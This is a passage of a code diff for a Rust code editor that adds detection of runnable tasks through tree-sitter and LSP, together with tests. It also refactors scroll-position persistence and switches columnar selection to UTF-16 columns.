+#[derive(Clone)]
+pub struct ResolvedTasks {
+ pub templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>,
+ pub position: Anchor,
+}
+
+impl Editor {
+ pub fn refresh_runnables(
+ &mut self,
+ invalidate_buffer_data: Option<BufferId>,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ if !self.mode().is_full()
+ || !EditorSettings::get_global(cx).gutter.runnables
+ || !self.enable_runnables
+ {
+ self.clear_runnables(None);
+ return;
+ }
+ if let Some(buffer) = self.buffer().read(cx).as_singleton() {
+ let buffer_id = buffer.read(cx).remote_id();
+ if invalidate_buffer_data != Some(buffer_id)
+ && self
+ .runnables
+ .has_cached(buffer_id, &buffer.read(cx).version())
+ {
+ return;
+ }
+ }
+ if let Some(buffer_id) = invalidate_buffer_data {
+ self.runnables.invalidate_buffer_data.insert(buffer_id);
+ }
+
+ let project = self.project().map(Entity::downgrade);
+ let lsp_task_sources = self.lsp_task_sources(true, true, cx);
+ let multi_buffer = self.buffer.downgrade();
+ self.runnables.runnables_update_task = cx.spawn_in(window, async move |editor, cx| {
+ cx.background_executor().timer(UPDATE_DEBOUNCE).await;
+ let Some(project) = project.and_then(|p| p.upgrade()) else {
+ return;
+ };
+
+ let hide_runnables = project.update(cx, |project, _| project.is_via_collab());
+ if hide_runnables {
+ return;
+ }
+ let lsp_tasks = if lsp_task_sources.is_empty() {
+ Vec::new()
+ } else {
+ let Ok(lsp_tasks) = cx
+ .update(|_, cx| crate::lsp_tasks(project.clone(), &lsp_task_sources, None, cx))
+ else {
+ return;
+ };
+ lsp_tasks.await
+ };
+ let new_rows = {
+ let Some((multi_buffer_snapshot, multi_buffer_query_range)) = editor
+ .update(cx, |editor, cx| {
+ let multi_buffer = editor.buffer().read(cx);
+ if multi_buffer.is_singleton() {
+ Some((multi_buffer.snapshot(cx), Anchor::min()..Anchor::max()))
+ } else {
+ let display_snapshot =
+ editor.display_map.update(cx, |map, cx| map.snapshot(cx));
+ let multi_buffer_query_range =
+ editor.multi_buffer_visible_range(&display_snapshot, cx);
+ let multi_buffer_snapshot = display_snapshot.buffer();
+ Some((
+ multi_buffer_snapshot.clone(),
+ multi_buffer_query_range.to_anchors(&multi_buffer_snapshot),
+ ))
+ }
+ })
+ .ok()
+ .flatten()
+ else {
+ return;
+ };
+ cx.background_spawn({
+ async move {
+ multi_buffer_snapshot
+ .runnable_ranges(multi_buffer_query_range)
+ .collect()
+ }
+ })
+ .await
+ };
+
+ let Ok(multi_buffer_snapshot) =
+ editor.update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx))
+ else {
+ return;
+ };
+ let Ok(mut lsp_tasks_by_rows) = cx.update(|_, cx| {
+ lsp_tasks
+ .into_iter()
+ .flat_map(|(kind, tasks)| {
+ tasks.into_iter().filter_map(move |(location, task)| {
+ Some((kind.clone(), location?, task))
+ })
+ })
+ .fold(HashMap::default(), |mut acc, (kind, location, task)| {
+ let buffer = location.target.buffer;
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let offset = multi_buffer_snapshot.excerpts().find_map(
+ |(excerpt_id, snapshot, _)| {
+ if snapshot.remote_id() == buffer_snapshot.remote_id() {
+ multi_buffer_snapshot
+ .anchor_in_excerpt(excerpt_id, location.target.range.start)
+ } else {
+ None
+ }
+ },
+ );
+ if let Some(offset) = offset {
+ let task_buffer_range =
+ location.target.range.to_point(&buffer_snapshot);
+ let context_buffer_range =
+ task_buffer_range.to_offset(&buffer_snapshot);
+ let context_range = BufferOffset(context_buffer_range.start)
+ ..BufferOffset(context_buffer_range.end);
+
+ acc.entry((buffer_snapshot.remote_id(), task_buffer_range.start.row))
+ .or_insert_with(|| RunnableTasks {
+ templates: Vec::new(),
+ offset,
+ column: task_buffer_range.start.column,
+ extra_variables: HashMap::default(),
+ context_range,
+ })
+ .templates
+ .push((kind, task.original_task().clone()));
+ }
+
+ acc
+ })
+ }) else {
+ return;
+ };
+
+ let Ok(prefer_lsp) = multi_buffer.update(cx, |buffer, cx| {
+ buffer.language_settings(cx).tasks.prefer_lsp
+ }) else {
+ return;
+ };
+
+ let rows = Self::runnable_rows(
+ project,
+ multi_buffer_snapshot,
+ prefer_lsp && !lsp_tasks_by_rows.is_empty(),
+ new_rows,
+ cx.clone(),
+ )
+ .await;
+ editor
+ .update(cx, |editor, cx| {
+ for buffer_id in std::mem::take(&mut editor.runnables.invalidate_buffer_data) {
+ editor.clear_runnables(Some(buffer_id));
+ }
+
+ for ((buffer_id, row), mut new_tasks) in rows {
+ let Some(buffer) = editor.buffer().read(cx).buffer(buffer_id) else {
+ continue;
+ };
+
+ if let Some(lsp_tasks) = lsp_tasks_by_rows.remove(&(buffer_id, row)) {
+ new_tasks.templates.extend(lsp_tasks.templates);
+ }
+ editor.insert_runnables(
+ buffer_id,
+ buffer.read(cx).version(),
+ row,
+ new_tasks,
+ );
+ }
+ for ((buffer_id, row), new_tasks) in lsp_tasks_by_rows {
+ let Some(buffer) = editor.buffer().read(cx).buffer(buffer_id) else {
+ continue;
+ };
+ editor.insert_runnables(
+ buffer_id,
+ buffer.read(cx).version(),
+ row,
+ new_tasks,
+ );
+ }
+ })
+ .ok();
+ });
+ }
+
+ pub fn spawn_nearest_task(
+ &mut self,
+ action: &SpawnNearestTask,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let Some((workspace, _)) = self.workspace.clone() else {
+ return;
+ };
+ let Some(project) = self.project.clone() else {
+ return;
+ };
+
+ // Try to find a closest, enclosing node using tree-sitter that has a task
+ let Some((buffer, buffer_row, tasks)) = self
+ .find_enclosing_node_task(cx)
+ // Or find the task that's closest in row-distance.
+ .or_else(|| self.find_closest_task(cx))
+ else {
+ return;
+ };
+
+ let reveal_strategy = action.reveal;
+ let task_context = Self::build_tasks_context(&project, &buffer, buffer_row, &tasks, cx);
+ cx.spawn_in(window, async move |_, cx| {
+ let context = task_context.await?;
+ let (task_source_kind, mut resolved_task) = tasks.resolve(&context).next()?;
+
+ let resolved = &mut resolved_task.resolved;
+ resolved.reveal = reveal_strategy;
+
+ workspace
+ .update_in(cx, |workspace, window, cx| {
+ workspace.schedule_resolved_task(
+ task_source_kind,
+ resolved_task,
+ false,
+ window,
+ cx,
+ );
+ })
+ .ok()
+ })
+ .detach();
+ }
+
+ pub fn clear_runnables(&mut self, for_buffer: Option<BufferId>) {
+ if let Some(buffer_id) = for_buffer {
+ self.runnables.runnables.remove(&buffer_id);
+ } else {
+ self.runnables.runnables.clear();
+ }
+ self.runnables.invalidate_buffer_data.clear();
+ self.runnables.runnables_update_task = Task::ready(());
+ }
+
+ pub fn task_context(&self, window: &mut Window, cx: &mut App) -> Task<Option<TaskContext>> {
+ let Some(project) = self.project.clone() else {
+ return Task::ready(None);
+ };
+ let (selection, buffer, editor_snapshot) = {
+ let selection = self.selections.newest_adjusted(&self.display_snapshot(cx));
+ let Some((buffer, _)) = self
+ .buffer()
+ .read(cx)
+ .point_to_buffer_offset(selection.start, cx)
+ else {
+ return Task::ready(None);
+ };
+ let snapshot = self.snapshot(window, cx);
+ (selection, buffer, snapshot)
+ };
+ let selection_range = selection.range();
+ let start = editor_snapshot
+ .display_snapshot
+ .buffer_snapshot()
+ .anchor_after(selection_range.start)
+ .text_anchor;
+ let end = editor_snapshot
+ .display_snapshot
+ .buffer_snapshot()
+ .anchor_after(selection_range.end)
+ .text_anchor;
+ let location = Location {
+ buffer,
+ range: start..end,
+ };
+ let captured_variables = {
+ let mut variables = TaskVariables::default();
+ let buffer = location.buffer.read(cx);
+ let buffer_id = buffer.remote_id();
+ let snapshot = buffer.snapshot();
+ let starting_point = location.range.start.to_point(&snapshot);
+ let starting_offset = starting_point.to_offset(&snapshot);
+ for (_, tasks) in self
+ .runnables
+ .runnables
+ .get(&buffer_id)
+ .into_iter()
+ .flat_map(|(_, tasks)| tasks.range(0..starting_point.row + 1))
+ {
+ if !tasks
+ .context_range
+ .contains(&crate::BufferOffset(starting_offset))
+ {
+ continue;
+ }
+ for (capture_name, value) in tasks.extra_variables.iter() {
+ variables.insert(
+ VariableName::Custom(capture_name.to_owned().into()),
+ value.clone(),
+ );
+ }
+ }
+ variables
+ };
+
+ project.update(cx, |project, cx| {
+ project.task_store().update(cx, |task_store, cx| {
+ task_store.task_context_for_location(captured_variables, location, cx)
+ })
+ })
+ }
+
+ pub fn lsp_task_sources(
+ &self,
+ visible_only: bool,
+ skip_cached: bool,
+ cx: &mut Context<Self>,
+ ) -> HashMap<LanguageServerName, Vec<BufferId>> {
+ if !self.lsp_data_enabled() {
+ return HashMap::default();
+ }
+ let buffers = if visible_only {
+ self.visible_excerpts(true, cx)
+ .into_values()
+ .map(|(buffer, _, _)| buffer)
+ .collect()
+ } else {
+ self.buffer().read(cx).all_buffers()
+ };
+
+ let lsp_settings = &ProjectSettings::get_global(cx).lsp;
+
+ buffers
+ .into_iter()
+ .filter_map(|buffer| {
+ let lsp_tasks_source = buffer
+ .read(cx)
+ .language()?
+ .context_provider()?
+ .lsp_task_source()?;
+ if lsp_settings
+ .get(&lsp_tasks_source)
+ .is_none_or(|s| s.enable_lsp_tasks)
+ {
+ let buffer_id = buffer.read(cx).remote_id();
+ if skip_cached
+ && self
+ .runnables
+ .has_cached(buffer_id, &buffer.read(cx).version())
+ {
+ None
+ } else {
+ Some((lsp_tasks_source, buffer_id))
+ }
+ } else {
+ None
+ }
+ })
+ .fold(
+ HashMap::default(),
+ |mut acc, (lsp_task_source, buffer_id)| {
+ acc.entry(lsp_task_source)
+ .or_insert_with(Vec::new)
+ .push(buffer_id);
+ acc
+ },
+ )
+ }
+
+ pub fn find_enclosing_node_task(
+ &mut self,
+ cx: &mut Context<Self>,
+ ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
+ let snapshot = self.buffer.read(cx).snapshot(cx);
+ let offset = self
+ .selections
+ .newest::<MultiBufferOffset>(&self.display_snapshot(cx))
+ .head();
+ let mut excerpt = snapshot.excerpt_containing(offset..offset)?;
+ let offset = excerpt.map_offset_to_buffer(offset);
+ let buffer_id = excerpt.buffer().remote_id();
+
+ let layer = excerpt.buffer().syntax_layer_at(offset)?;
+ let mut cursor = layer.node().walk();
+
+ while cursor.goto_first_child_for_byte(offset.0).is_some() {
+ if cursor.node().end_byte() == offset.0 {
+ cursor.goto_next_sibling();
+ }
+ }
+
+ // Ascend to the smallest ancestor that contains the range and has a task.
+ loop {
+ let node = cursor.node();
+ let node_range = node.byte_range();
+ let symbol_start_row = excerpt.buffer().offset_to_point(node.start_byte()).row;
+
+ // Check if this node contains our offset
+ if node_range.start <= offset.0 && node_range.end >= offset.0 {
+ // If it contains offset, check for task
+ if let Some(tasks) = self
+ .runnables
+ .runnables
+ .get(&buffer_id)
+ .and_then(|(_, tasks)| tasks.get(&symbol_start_row))
+ {
+ let buffer = self.buffer.read(cx).buffer(buffer_id)?;
+ return Some((buffer, symbol_start_row, Arc::new(tasks.to_owned())));
+ }
+ }
+
+ if !cursor.goto_parent() {
+ break;
+ }
+ }
+ None
+ }
+
+ pub fn render_run_indicator(
+ &self,
+ _style: &EditorStyle,
+ is_active: bool,
+ row: DisplayRow,
+ breakpoint: Option<(Anchor, Breakpoint, Option<BreakpointSessionState>)>,
+ cx: &mut Context<Self>,
+ ) -> IconButton {
+ let color = Color::Muted;
+ let position = breakpoint.as_ref().map(|(anchor, _, _)| *anchor);
+
+ IconButton::new(
+ ("run_indicator", row.0 as usize),
+ ui::IconName::PlayOutlined,
+ )
+ .shape(ui::IconButtonShape::Square)
+ .icon_size(IconSize::XSmall)
+ .icon_color(color)
+ .toggle_state(is_active)
+ .on_click(cx.listener(move |editor, e: &ClickEvent, window, cx| {
+ let quick_launch = match e {
+ ClickEvent::Keyboard(_) => true,
+ ClickEvent::Mouse(e) => e.down.button == MouseButton::Left,
+ };
+
+ window.focus(&editor.focus_handle(cx), cx);
+ editor.toggle_code_actions(
+ &ToggleCodeActions {
+ deployed_from: Some(CodeActionSource::RunMenu(row)),
+ quick_launch,
+ },
+ window,
+ cx,
+ );
+ }))
+ .on_right_click(cx.listener(move |editor, event: &ClickEvent, window, cx| {
+ editor.set_breakpoint_context_menu(row, position, event.position(), window, cx);
+ }))
+ }
+
+ fn insert_runnables(
+ &mut self,
+ buffer: BufferId,
+ version: Global,
+ row: BufferRow,
+ new_tasks: RunnableTasks,
+ ) {
+ let (old_version, tasks) = self.runnables.runnables.entry(buffer).or_default();
+ if !old_version.changed_since(&version) {
+ *old_version = version;
+ tasks.insert(row, new_tasks);
+ }
+ }
+
+ fn runnable_rows(
+ project: Entity<Project>,
+ snapshot: MultiBufferSnapshot,
+ prefer_lsp: bool,
+ runnable_ranges: Vec<(Range<Anchor>, language::RunnableRange)>,
+ cx: AsyncWindowContext,
+ ) -> Task<Vec<((BufferId, BufferRow), RunnableTasks)>> {
+ cx.spawn(async move |cx| {
+ let mut runnable_rows = Vec::with_capacity(runnable_ranges.len());
+ for (run_range, mut runnable) in runnable_ranges {
+ let Some(tasks) = cx
+ .update(|_, cx| Self::templates_with_tags(&project, &mut runnable.runnable, cx))
+ .ok()
+ else {
+ continue;
+ };
+ let mut tasks = tasks.await;
+
+ if prefer_lsp {
+ tasks.retain(|(task_kind, _)| {
+ !matches!(task_kind, TaskSourceKind::Language { .. })
+ });
+ }
+ if tasks.is_empty() {
+ continue;
+ }
+
+ let point = run_range.start.to_point(&snapshot);
+ let Some(row) = snapshot
+ .buffer_line_for_row(MultiBufferRow(point.row))
+ .map(|(_, range)| range.start.row)
+ else {
+ continue;
+ };
+
+ let context_range =
+ BufferOffset(runnable.full_range.start)..BufferOffset(runnable.full_range.end);
+ runnable_rows.push((
+ (runnable.buffer_id, row),
+ RunnableTasks {
+ templates: tasks,
+ offset: run_range.start,
+ context_range,
+ column: point.column,
+ extra_variables: runnable.extra_captures,
+ },
+ ));
+ }
+ runnable_rows
+ })
+ }
+
+ fn templates_with_tags(
+ project: &Entity<Project>,
+ runnable: &mut Runnable,
+ cx: &mut App,
+ ) -> Task<Vec<(TaskSourceKind, TaskTemplate)>> {
+ let (inventory, worktree_id, file) = project.read_with(cx, |project, cx| {
+ let (worktree_id, file) = project
+ .buffer_for_id(runnable.buffer, cx)
+ .and_then(|buffer| buffer.read(cx).file())
+ .map(|file| (file.worktree_id(cx), file.clone()))
+ .unzip();
+
+ (
+ project.task_store().read(cx).task_inventory().cloned(),
+ worktree_id,
+ file,
+ )
+ });
+
+ let tags = mem::take(&mut runnable.tags);
+ let language = runnable.language.clone();
+ cx.spawn(async move |cx| {
+ let mut templates_with_tags = Vec::new();
+ if let Some(inventory) = inventory {
+ for RunnableTag(tag) in tags {
+ let new_tasks = inventory.update(cx, |inventory, cx| {
+ inventory.list_tasks(file.clone(), Some(language.clone()), worktree_id, cx)
+ });
+ templates_with_tags.extend(new_tasks.await.into_iter().filter(
+ move |(_, template)| {
+ template.tags.iter().any(|source_tag| source_tag == &tag)
+ },
+ ));
+ }
+ }
+ templates_with_tags.sort_by_key(|(kind, _)| kind.to_owned());
+
+ if let Some((leading_tag_source, _)) = templates_with_tags.first() {
+                // The strongest source wins: prefer a worktree tag binding to
+                // global and language bindings, and
+                // prefer a global binding to a language binding.
+ let first_mismatch = templates_with_tags
+ .iter()
+ .position(|(tag_source, _)| tag_source != leading_tag_source);
+ if let Some(index) = first_mismatch {
+ templates_with_tags.truncate(index);
+ }
+ }
+
+ templates_with_tags
+ })
+ }
+
+ fn find_closest_task(
+ &mut self,
+ cx: &mut Context<Self>,
+ ) -> Option<(Entity<Buffer>, u32, Arc<RunnableTasks>)> {
+ let cursor_row = self
+ .selections
+ .newest_adjusted(&self.display_snapshot(cx))
+ .head()
+ .row;
+
+ let ((buffer_id, row), tasks) = self
+ .runnables
+ .runnables
+ .iter()
+ .flat_map(|(buffer_id, (_, tasks))| {
+ tasks.iter().map(|(row, tasks)| ((*buffer_id, *row), tasks))
+ })
+ .min_by_key(|((_, row), _)| cursor_row.abs_diff(*row))?;
+
+ let buffer = self.buffer.read(cx).buffer(buffer_id)?;
+ let tasks = Arc::new(tasks.to_owned());
+ Some((buffer, row, tasks))
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use std::{sync::Arc, time::Duration};
+
+ use futures::StreamExt as _;
+ use gpui::{AppContext as _, Task, TestAppContext};
+ use indoc::indoc;
+ use language::{ContextProvider, FakeLspAdapter};
+ use languages::rust_lang;
+ use lsp::LanguageServerName;
+ use multi_buffer::{MultiBuffer, PathKey};
+ use project::{
+ FakeFs, Project,
+ lsp_store::lsp_ext_command::{CargoRunnableArgs, Runnable, RunnableArgs, RunnableKind},
+ };
+ use serde_json::json;
+ use task::{TaskTemplate, TaskTemplates};
+ use text::Point;
+ use util::path;
+
+ use crate::{
+ Editor, UPDATE_DEBOUNCE, editor_tests::init_test, scroll::scroll_amount::ScrollAmount,
+ test::build_editor_with_project,
+ };
+
+ const FAKE_LSP_NAME: &str = "the-fake-language-server";
+
+ struct TestRustContextProvider;
+
+ impl ContextProvider for TestRustContextProvider {
+ fn associated_tasks(
+ &self,
+ _: Option<Arc<dyn language::File>>,
+ _: &gpui::App,
+ ) -> Task<Option<TaskTemplates>> {
+ Task::ready(Some(TaskTemplates(vec![
+ TaskTemplate {
+ label: "Run main".into(),
+ command: "cargo".into(),
+ args: vec!["run".into()],
+ tags: vec!["rust-main".into()],
+ ..TaskTemplate::default()
+ },
+ TaskTemplate {
+ label: "Run test".into(),
+ command: "cargo".into(),
+ args: vec!["test".into()],
+ tags: vec!["rust-test".into()],
+ ..TaskTemplate::default()
+ },
+ ])))
+ }
+ }
+
+ struct TestRustContextProviderWithLsp;
+
+ impl ContextProvider for TestRustContextProviderWithLsp {
+ fn associated_tasks(
+ &self,
+ _: Option<Arc<dyn language::File>>,
+ _: &gpui::App,
+ ) -> Task<Option<TaskTemplates>> {
+ Task::ready(Some(TaskTemplates(vec![TaskTemplate {
+ label: "Run test".into(),
+ command: "cargo".into(),
+ args: vec!["test".into()],
+ tags: vec!["rust-test".into()],
+ ..TaskTemplate::default()
+ }])))
+ }
+
+ fn lsp_task_source(&self) -> Option<LanguageServerName> {
+ Some(LanguageServerName::new_static(FAKE_LSP_NAME))
+ }
+ }
+
+ fn rust_lang_with_task_context() -> Arc<language::Language> {
+ Arc::new(
+ Arc::try_unwrap(rust_lang())
+ .unwrap()
+ .with_context_provider(Some(Arc::new(TestRustContextProvider))),
+ )
+ }
+
+ fn rust_lang_with_lsp_task_context() -> Arc<language::Language> {
+ Arc::new(
+ Arc::try_unwrap(rust_lang())
+ .unwrap()
+ .with_context_provider(Some(Arc::new(TestRustContextProviderWithLsp))),
+ )
+ }
+
+ fn collect_runnable_labels(
+ editor: &Editor,
+ ) -> Vec<(text::BufferId, language::BufferRow, Vec<String>)> {
+ let mut result = editor
+ .runnables
+ .runnables
+ .iter()
+ .flat_map(|(buffer_id, (_, tasks))| {
+ tasks.iter().map(move |(row, runnable_tasks)| {
+ let mut labels: Vec<String> = runnable_tasks
+ .templates
+ .iter()
+ .map(|(_, template)| template.label.clone())
+ .collect();
+ labels.sort();
+ (*buffer_id, *row, labels)
+ })
+ })
+ .collect::<Vec<_>>();
+ result.sort_by_key(|(id, row, _)| (*id, *row));
+ result
+ }
+
+ #[gpui::test]
+ async fn test_multi_buffer_runnables_on_scroll(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let padding_lines = 50;
+ let mut first_rs = String::from("fn main() {\n println!(\"hello\");\n}\n");
+ for _ in 0..padding_lines {
+ first_rs.push_str("//\n");
+ }
+ let test_one_row = 3 + padding_lines as u32 + 1;
+ first_rs.push_str("#[test]\nfn test_one() {\n assert!(true);\n}\n");
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "first.rs": first_rs,
+ "second.rs": indoc! {"
+ #[test]
+ fn test_two() {
+ assert!(true);
+ }
+
+ #[test]
+ fn test_three() {
+ assert!(true);
+ }
+ "},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang_with_task_context());
+
+ let buffer_1 = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/first.rs"), cx)
+ })
+ .await
+ .unwrap();
+ let buffer_2 = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/second.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let buffer_1_id = buffer_1.read_with(cx, |buffer, _| buffer.remote_id());
+ let buffer_2_id = buffer_2.read_with(cx, |buffer, _| buffer.remote_id());
+
+ let multi_buffer = cx.new(|cx| {
+ let mut multi_buffer = MultiBuffer::new(language::Capability::ReadWrite);
+ let end = buffer_1.read(cx).max_point();
+ multi_buffer.set_excerpts_for_path(
+ PathKey::sorted(0),
+ buffer_1.clone(),
+ [Point::new(0, 0)..end],
+ 0,
+ cx,
+ );
+ multi_buffer.set_excerpts_for_path(
+ PathKey::sorted(1),
+ buffer_2.clone(),
+ [Point::new(0, 0)..Point::new(8, 1)],
+ 0,
+ cx,
+ );
+ multi_buffer
+ });
+
+ let editor = cx.add_window(|window, cx| {
+ Editor::for_multibuffer(multi_buffer, Some(project.clone()), window, cx)
+ });
+ cx.executor().advance_clock(Duration::from_millis(500));
+ cx.executor().run_until_parked();
+
+ // Clear stale data from startup events, then refresh.
+ // first.rs is long enough that second.rs is below the ~47-line viewport.
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.clear_runnables(None);
+ editor.refresh_runnables(None, window, cx);
+ })
+ .unwrap();
+ cx.executor().advance_clock(UPDATE_DEBOUNCE);
+ cx.executor().run_until_parked();
+ assert_eq!(
+ editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .unwrap(),
+ vec![(buffer_1_id, 0, vec!["Run main".to_string()])],
+ "Only fn main from first.rs should be visible before scrolling"
+ );
+
+ // Scroll down to bring second.rs excerpts into view.
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.scroll_screen(&ScrollAmount::Page(1.0), window, cx);
+ })
+ .unwrap();
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.executor().run_until_parked();
+
+ let after_scroll = editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .unwrap();
+ assert_eq!(
+ after_scroll,
+ vec![
+ (buffer_1_id, 0, vec!["Run main".to_string()]),
+ (buffer_1_id, test_one_row, vec!["Run test".to_string()]),
+ (buffer_2_id, 1, vec!["Run test".to_string()]),
+ (buffer_2_id, 6, vec!["Run test".to_string()]),
+ ],
+ "Tree-sitter should detect both #[test] fns in second.rs after scroll"
+ );
+
+ // Edit second.rs to invalidate its cache; first.rs data should persist.
+ buffer_2.update(cx, |buffer, cx| {
+ buffer.edit([(0..0, "// added comment\n")], None, cx);
+ });
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.scroll_screen(&ScrollAmount::Page(-1.0), window, cx);
+ })
+ .unwrap();
+ cx.executor().advance_clock(Duration::from_millis(200));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .unwrap(),
+ vec![
+ (buffer_1_id, 0, vec!["Run main".to_string()]),
+ (buffer_1_id, test_one_row, vec!["Run test".to_string()]),
+ ],
+ "first.rs runnables should survive an edit to second.rs"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_lsp_runnables_removed_after_edit(cx: &mut TestAppContext) {
+ init_test(cx, |_| {});
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/project"),
+ json!({
+ "main.rs": indoc! {"
+ #[test]
+ fn test_one() {
+ assert!(true);
+ }
+
+ fn helper() {}
+ "},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/project").as_ref()], cx).await;
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang_with_lsp_task_context());
+
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ name: FAKE_LSP_NAME,
+ ..FakeLspAdapter::default()
+ },
+ );
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/project/main.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let buffer_id = buffer.read_with(cx, |buffer, _| buffer.remote_id());
+
+ let multi_buffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx));
+ let editor = cx.add_window(|window, cx| {
+ build_editor_with_project(project.clone(), multi_buffer, window, cx)
+ });
+
+ let fake_server = fake_servers.next().await.expect("fake LSP server");
+
+ use project::lsp_store::lsp_ext_command::Runnables;
+ fake_server.set_request_handler::<Runnables, _, _>(move |params, _| async move {
+ let text = params.text_document.uri.path().to_string();
+ if text.contains("main.rs") {
+ let uri = lsp::Uri::from_file_path(path!("/project/main.rs")).expect("valid uri");
+ Ok(vec![Runnable {
+ label: "LSP test_one".into(),
+ location: Some(lsp::LocationLink {
+ origin_selection_range: None,
+ target_uri: uri,
+ target_range: lsp::Range::new(
+ lsp::Position::new(0, 0),
+ lsp::Position::new(3, 1),
+ ),
+ target_selection_range: lsp::Range::new(
+ lsp::Position::new(0, 0),
+ lsp::Position::new(3, 1),
+ ),
+ }),
+ kind: RunnableKind::Cargo,
+ args: RunnableArgs::Cargo(CargoRunnableArgs {
+ environment: Default::default(),
+ cwd: path!("/project").into(),
+ override_cargo: None,
+ workspace_root: None,
+ cargo_args: vec!["test".into(), "test_one".into()],
+ executable_args: Vec::new(),
+ }),
+ }])
+ } else {
+ Ok(Vec::new())
+ }
+ });
+
+ // Trigger a refresh to pick up both tree-sitter and LSP runnables.
+ editor
+ .update(cx, |editor, window, cx| {
+ editor.refresh_runnables(None, window, cx);
+ })
+ .expect("editor update");
+ cx.executor().advance_clock(UPDATE_DEBOUNCE);
+ cx.executor().run_until_parked();
+
+ let labels = editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .expect("editor update");
+ assert_eq!(
+ labels,
+ vec![(buffer_id, 0, vec!["LSP test_one".to_string()]),],
+ "LSP runnables should appear for #[test] fn"
+ );
+
+ // Remove `#[test]` attribute so the function is no longer a test.
+ buffer.update(cx, |buffer, cx| {
+ let test_attr_end = buffer.text().find("\nfn test_one").expect("find fn");
+ buffer.edit([(0..test_attr_end, "")], None, cx);
+ });
+
+ // Also update the LSP handler to return no runnables.
+ fake_server
+ .set_request_handler::<Runnables, _, _>(move |_, _| async move { Ok(Vec::new()) });
+
+ cx.executor().advance_clock(UPDATE_DEBOUNCE);
+ cx.executor().run_until_parked();
+
+ let labels = editor
+ .update(cx, |editor, _, _| collect_runnable_labels(editor))
+ .expect("editor update");
+ assert_eq!(
+ labels,
+ Vec::<(text::BufferId, language::BufferRow, Vec<String>)>::new(),
+ "Runnables should be removed after #[test] is deleted and LSP returns empty"
+ );
+ }
+}
@@ -8,7 +8,7 @@ use crate::{
InlayHintRefreshReason, MultiBufferSnapshot, RowExt, ToPoint,
display_map::{DisplaySnapshot, ToDisplayPoint},
hover_popover::hide_hover,
- persistence::DB,
+ persistence::EditorDb,
};
pub use autoscroll::{Autoscroll, AutoscrollStrategy};
use core::fmt::Debug;
@@ -467,12 +467,13 @@ impl ScrollManager {
let item_id = cx.entity().entity_id().as_u64() as ItemId;
let executor = cx.background_executor().clone();
+ let db = EditorDb::global(cx);
self._save_scroll_position_task = cx.background_executor().spawn(async move {
executor.timer(Duration::from_millis(10)).await;
log::debug!(
"Saving scroll position for item {item_id:?} in workspace {workspace_id:?}"
);
- DB.save_scroll_position(
+ db.save_scroll_position(
item_id,
workspace_id,
top_row,
@@ -937,7 +938,7 @@ impl Editor {
window: &mut Window,
cx: &mut Context<Editor>,
) {
- let scroll_position = DB.get_scroll_position(item_id, workspace_id);
+ let scroll_position = EditorDb::global(cx).get_scroll_position(item_id, workspace_id);
if let Ok(Some((top_row, x, y))) = scroll_position {
let top_anchor = self
.buffer()
@@ -7,7 +7,7 @@ use std::{
use collections::HashMap;
use gpui::Pixels;
use itertools::Itertools as _;
-use language::{Bias, Point, Selection, SelectionGoal};
+use language::{Bias, Point, PointUtf16, Selection, SelectionGoal};
use multi_buffer::{MultiBufferDimension, MultiBufferOffset};
use util::post_inc;
@@ -408,11 +408,11 @@ impl SelectionsCollection {
}
/// Attempts to build a selection in the provided buffer row using the
- /// same buffer column range as specified.
+ /// same UTF-16 column range as specified.
/// Returns `None` if the range is not empty but it starts past the line's
/// length, meaning that the line isn't long enough to be contained within
/// part of the provided range.
- pub fn build_columnar_selection_from_buffer_columns(
+ fn build_columnar_selection_from_utf16_columns(
&mut self,
display_map: &DisplaySnapshot,
buffer_row: u32,
@@ -420,23 +420,22 @@ impl SelectionsCollection {
reversed: bool,
text_layout_details: &TextLayoutDetails,
) -> Option<Selection<Point>> {
+ let snapshot = display_map.buffer_snapshot();
let is_empty = positions.start == positions.end;
- let line_len = display_map
- .buffer_snapshot()
- .line_len(multi_buffer::MultiBufferRow(buffer_row));
+ let line_len_utf16 = snapshot.line_len_utf16(multi_buffer::MultiBufferRow(buffer_row));
let (start, end) = if is_empty {
- let column = std::cmp::min(positions.start, line_len);
- let point = Point::new(buffer_row, column);
+ let column = std::cmp::min(positions.start, line_len_utf16);
+ let point = snapshot.point_utf16_to_point(PointUtf16::new(buffer_row, column));
(point, point)
} else {
- if positions.start >= line_len {
+ if positions.start >= line_len_utf16 {
return None;
}
- let start = Point::new(buffer_row, positions.start);
- let end_column = std::cmp::min(positions.end, line_len);
- let end = Point::new(buffer_row, end_column);
+ let start = snapshot.point_utf16_to_point(PointUtf16::new(buffer_row, positions.start));
